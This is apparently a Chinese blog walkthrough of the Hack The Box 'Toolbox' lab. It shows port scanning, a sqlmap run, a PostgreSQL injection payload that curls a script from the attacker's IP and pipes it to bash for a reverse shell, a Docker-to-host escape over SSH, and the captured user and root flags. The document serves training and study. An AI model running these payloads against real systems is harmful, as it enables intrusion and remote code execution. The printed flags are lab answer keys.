[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升

2025-03-08 140 0

Information Gathering

IP Address Opening Ports
10.10.10.236 TCP:21,22,135,139,443,445,5985,47001,49664,49665,49666,49667,49668,49669

$ ip='10.10.10.236'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b1aa18199eaf79602192e6e97045a3f (RSA)
|   256 a24b5ac70ff399a13aca7d542876b2dd (ECDSA)
|_  256 ea08966023e2f44f8d05b31841352339 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp   open  ssl/http      Apache httpd 2.4.38 ((Debian))
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.38 (Debian)
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_http-title: MegaLogistics
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

PostgreSQL Injection RCE

# echo '10.10.10.236 megalogistic.com admin.megalogistic.com'>>/etc/hosts

https://megalogistic.com/

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图

https://admin.megalogistic.com/

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图1

POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
 
username=admin'&password=1

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图2

$ python3 /opt/sqlmap/sqlmap.py -u http://admin.megalogistic.com --batch --force-ssl --dbms=PostgreSQL -X POST --data 'username=admin&password=11111'

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图3

POST / HTTP/1.1
Host: admin.megalogistic.com
Cookie: PHPSESSID=4b2a7fb20b42bc87c66dac68719ea178
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://admin.megalogistic.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
Origin: https://admin.megalogistic.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
 
username=';COPY+(SELECT+'test')+TO+PROGRAM+'curl+10.10.16.33/reverse.sh|bash';--+-&password=1

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图4

User.txt

f0183e44378ea9774433e2ca6ac78c6a

Privilege Escalation:Docker Escape boot2docker

$ uname -a

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图5

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图6

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图7

$ SHELL=/bin/bash script -q /dev/null

postgres@bc56e3cc55e9:/tmp$ ssh docker@172.17.0.1

[Meachines] [Easy] Toolbox PostgreSQLI-RCE+Docker逃逸boot2docker权限提升插图8

docker@box:~$ cat /c/Users/Administrator/Desktop/root.txt

Root.txt

cc9a0b76ac17f8f475250738b96261b3

相关文章:

  1. [Meachines] [Medium] solidstate Apache JAMES RCE+P…
  2. [Meachines] [Easy] Remote NFS备份文件泄露+Umbraco-RCE+Te…
  3. [Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升
  4. [Meachines] [Easy] Horizontall Strapi RCE+KTOR-HTTP扫描+Laravel Monolog 权限提升
  5. [Meachines] [Easy] Laboratory GitLab v12.8.1 LFI+Ruby反序列化 RCE+横向移动+TRP00F权限…

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评 4A测评
网络安全
0 0

相关文章

【内网渗透基础(一)】信息收集
微软警告:Windows Server 2025 重启可能导致部分域控制器连接中断
打靶日记——pWnOS1
常用组件hutool的潜在Gadget分析
谷歌Chrome 136将修复存在20年的已访问链接隐私漏洞
2025年CISO应对勒索软件威胁指南

发布评论